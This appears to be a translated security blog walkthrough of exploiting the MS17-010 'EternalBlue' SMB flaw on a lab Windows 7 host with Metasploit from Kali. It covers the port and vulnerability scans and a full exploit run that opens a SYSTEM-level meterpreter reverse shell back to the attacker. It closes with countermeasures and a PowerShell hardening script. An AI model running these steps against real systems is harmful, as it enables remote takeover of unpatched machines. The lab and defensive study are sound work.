MS17-010 "EternalBlue" Vulnerability Analysis – Author: LXNSEC

The "EternalBlue" vulnerability

On the evening of 14 April 2017, the hacker group Shadow Brokers released a large batch of network attack tools, among them the "EternalBlue" tool, which exploits an SMB vulnerability in Windows to obtain the highest system privileges. On 12 May, criminals repurposed "EternalBlue" to build the WannaCry ransomware; university campus networks, large enterprise intranets and government agency networks in the UK, Russia, across Europe and in China were hit, and victims were extorted for large ransoms before their files could be decrypted and recovered.

Windows versions currently known to be affected include, but are not limited to: Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2 and Windows Server 2012 SP0.

The test environment for this write-up is Windows 7 Pro SP1.

Win7 IP  192.168.1.2

Kali IP 192.168.1.8

Enter the MSF console, locate the port-scan modules, and probe whether TCP port 445 (SMB) is open on the target host.

msf5 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     WordPress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 4
msf5 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

Set the port-scan module's IP and port parameters.

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
msf5 auxiliary(scanner/portscan/syn) > set ports 445
ports => 445
msf5 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      445              yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds


Run the module and check the result.

msf5 auxiliary(scanner/portscan/syn) > exploit 

[+]  TCP OPEN 192.168.1.2:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Port 445 is open on the target host.

Next, probe whether an SMB service is actually running on port 445.

msf5 > search scanner name:smb

Matching Modules
================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   auxiliary/admin/smb/check_dir_file                           normal  No     SMB Scanner Check File/Directory Utility
   1   auxiliary/scanner/sap/sap_smb_relay                          normal  No     SAP SMB Relay Abuse
   2   auxiliary/scanner/smb/pipe_auditor                           normal  No     SMB Session Pipe Auditor
   3   auxiliary/scanner/smb/pipe_dcerpc_auditor                    normal  No     SMB Session Pipe DCERPC Auditor
   4   auxiliary/scanner/smb/smb1                                   normal  No     SMBv1 Protocol Detection
   5   auxiliary/scanner/smb/smb2                                   normal  No     SMB 2.0 Protocol Detection
   6   auxiliary/scanner/smb/smb_enum_gpp                           normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   7   auxiliary/scanner/smb/smb_enumshares                         normal  No     SMB Share Enumeration
   8   auxiliary/scanner/smb/smb_enumusers                          normal  No     SMB User Enumeration (SAM EnumUsers)
   9   auxiliary/scanner/smb/smb_enumusers_domain                   normal  No     SMB Domain User Enumeration
   10  auxiliary/scanner/smb/smb_login                              normal  No     SMB Login Check Scanner
   11  auxiliary/scanner/smb/smb_lookupsid                          normal  No     SMB SID User Enumeration (LookupSid)
   12  auxiliary/scanner/smb/smb_ms17_010                           normal  No     MS17-010 SMB RCE Detection
   13  auxiliary/scanner/smb/smb_version                            normal  No     SMB Version Detection
   14  auxiliary/scanner/snmp/snmp_enumshares                       normal  No     SNMP Windows SMB Share Enumeration


Interact with a module by name or index, for example use 14 or use auxiliary/scanner/snmp/snmp_enumshares

msf5 > use 13
msf5 auxiliary(scanner/smb/smb_version) > options 

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

Set the SMB detection module's target host parameter.

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

Run the module and check the result.

msf5 auxiliary(scanner/smb/smb_version) > exploit 

[+] 192.168.1.2:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:H-PC) (workgroup:WORKGROUP ) (signatures:optional)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The target host is running an SMB service on port 445.

Next, probe whether the target host is vulnerable to "EternalBlue".

msf5 > search auxiliary name:ms17-010

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                     normal  No     MS17-010 SMB RCE Detection


Interact with a module by name or index, for example use 1 or use auxiliary/scanner/smb/smb_ms17_010

msf5 > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Set the "EternalBlue" detection module's target host parameter.

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

Run the module and check the detection result.

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.1.2:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The result shows that the target host has the MS17-010 "EternalBlue" vulnerability.

Next, configure a payload and verify whether a shell can be obtained on the target host.

msf5 > search exploit name:ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   2  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   3  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index, for example use 3 or use exploit/windows/smb/ms17_010_psexec

msf5 > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.8      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

The parameters shown here still carry settings left over from an earlier test; by default they are normally empty.

Set the target host, i.e. the host under test.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

Set the host that receives the payload's reverse shell, i.e. the testing host; in my case this is Kali (the local host).

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.8
lhost => 192.168.1.8

Set the target host's operating system type. This module's Target option has only one entry, so it does not need to be changed.

msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Run the exploit and check the result.

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] 192.168.1.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.2:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.2:445 - Connecting to target for exploitation.
[+] 192.168.1.2:445 - Connection established for exploitation.
[+] 192.168.1.2:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.2:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.2:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.2:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.2:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.1.2:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.2:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.2:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.2:445 - Starting non-paged pool grooming
[+] 192.168.1.2:445 - Sending SMBv2 buffers
[+] 192.168.1.2:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.2:445 - Sending final SMBv2 buffers.
[*] 192.168.1.2:445 - Sending last fragment of exploit packet!
[*] 192.168.1.2:445 - Receiving response from exploit packet
[+] 192.168.1.2:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.2:445 - Sending egg to corrupted connection.
[*] 192.168.1.2:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.2:49214) at 2020-07-23 10:32:15 +0800
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > pwd
C:\Windows\system32

We have obtained a shell on the target host with SYSTEM privileges. This level of access is highly dangerous: it allows an attacker to capture the user's keystrokes, view the screen in real time, kill or create processes, and more.

Countermeasures for "EternalBlue"

1. Install the Microsoft patch for MS17-010.

2. On Windows 7, Windows 8 and Windows 10 machines, enable the Windows Firewall and add rules blocking ports 135, 137, 138, 139 and 445.

3. If antivirus software is installed, update it to the latest version.
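The following PowerShell script is an added example illustrating the countermeasures listed above; it is not part of the original post. It runs in an elevated PowerShell on Windows 7 SP1 or later and (a) reports whether one of the known MS17-010 updates is installed, (b) reports and disables the SMBv1 server, which is the protocol the exploit targets, and (c) adds inbound firewall block rules for the ports the post names. The KB numbers KB4012212 and KB4012215 (the March 2017 Windows 7 SP1 / Server 2008 R2 updates), the LanmanServer registry value and the use of netsh instead of New-NetFirewallRule are assumptions explained in the comments, not details taken from the page.

```powershell
# Added hardening/verification script (not from the original post).
# Run in an elevated PowerShell on Windows 7 SP1 or later.
# Assumption (not from the page): KB4012212 (security-only) and KB4012215
# (monthly rollup) are the March 2017 updates for Windows 7 SP1 / Server 2008 R2
# that ship the MS17-010 fix. Later cumulative rollups supersede them, so a
# missing KB does not by itself prove the host is unpatched; treat the check as
# a hint, not a verdict.
$Ms17010Kbs = @('KB4012212', 'KB4012215')

# Ports listed in the post's countermeasure 2.
$SmbPorts = @(135, 137, 138, 139, 445)

$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Patch {
    # Returns $true if one of the known MS17-010 KBs is installed.
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $Ms17010Kbs) {
        if ($installed -contains $kb) { return $true }
    }
    return $false
}

function Get-Smb1State {
    # Windows 8 / Server 2012 and later expose the SMB server cmdlets; Windows 7
    # does not, so fall back to the LanmanServer "SMB1" registry value that
    # Microsoft documents for disabling SMBv1. An absent value means SMBv1 is
    # still enabled (the OS default on Windows 7).
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return (Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    $val = Get-ItemProperty -Path $LanmanKey -Name SMB1 -ErrorAction SilentlyContinue
    if ($null -eq $val) { return $true }
    return [bool]$val.SMB1
}

function Disable-Smb1 {
    # Disable the SMBv1 server. A reboot is required before the change takes effect.
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        Set-ItemProperty -Path $LanmanKey -Name SMB1 -Type DWord -Value 0 -Force
    }
}

function Block-SmbPorts {
    # netsh advfirewall is available on Windows 7 as well as 8/10, whereas the
    # New-NetFirewallRule cmdlet only exists on Windows 8 / Server 2012 and later.
    # 137/138 are NetBIOS UDP services, 135/139/445 are TCP; blocking both
    # protocols on every port keeps the rule set simple.
    foreach ($port in $SmbPorts) {
        foreach ($proto in 'TCP', 'UDP') {
            $ruleName = "Block inbound $proto $port (MS17-010 mitigation)"
            netsh advfirewall firewall add rule name="$ruleName" dir=in action=block protocol=$proto localport=$port | Out-Null
        }
    }
    # Make sure the firewall is actually enforcing rules on every profile.
    netsh advfirewall set allprofiles state on | Out-Null
}

# Report the current state, then apply the mitigations. The patch itself must
# still come from Windows Update or the MS17-010 bulletin; this script only checks.
Write-Host ("MS17-010 KB present : {0}" -f (Test-Ms17010Patch))
Write-Host ("SMBv1 enabled       : {0}" -f (Get-Smb1State))
Disable-Smb1
Block-SmbPorts
Write-Host ("SMBv1 enabled (now) : {0}  (reboot required for the change to apply)" -f (Get-Smb1State))
```

Blocking inbound 445 also blocks legitimate file and printer sharing to the host, so on a file server the firewall rule should be scoped to untrusted source addresses rather than applied globally; disabling SMBv1 and installing the patch remove the vulnerability itself and should be done regardless of the firewall configuration.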


Source: freebuf.com 2020-07-24 10:03:26 by: LXNSEC
